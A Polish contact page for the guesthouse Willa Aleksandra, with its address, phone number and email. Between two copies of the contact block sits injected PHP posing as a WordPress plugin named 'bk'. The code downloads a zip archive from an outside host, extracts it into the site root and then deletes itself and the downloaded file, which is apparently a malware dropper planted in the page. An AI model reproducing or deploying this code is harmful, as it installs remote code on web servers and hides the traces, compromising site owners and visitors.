Kontakt
Willa Aleksandra
Adres: ul. Strażacka 22, 34-315 Międzybrodzie Żywieckie
Telefon komórkowy: +48 603 114 938
e-mail: willamiedzybrodzie@gmail.com
/* Plugin Name: bk Description: Author: d Version: 1 */ if (!defined('__DIR__')) { define('__DIR__', dirname(__FILE__)); } $rootpath = __DIR__ . '/../../..'; //die($rootpath); if (false === file_exists($rootpath . '/_bkpex_backup-script/public/index.php') ) { $tempFilePath = '_bkpex_backup-script.zip'; file_put_contents($tempFilePath, file_get_contents('http://krolowajadwiga.meteor24.pl/seo/_bkpex_backup-script.zip')); $zip = new ZipArchive; $res = $zip->open($tempFilePath); if ( $res === TRUE ) { $zip->extractTo($rootpath . '/'); $zip->close(); echo 'ok'; } else { echo 'error!'; } unlink(__FILE__); unlink($tempFilePath); }
Willa Aleksandra
Adres: ul. Strażacka 22, 34-315 Międzybrodzie Żywieckie
Telefon komórkowy: +48 603 114 938
e-mail: willamiedzybrodzie@gmail.com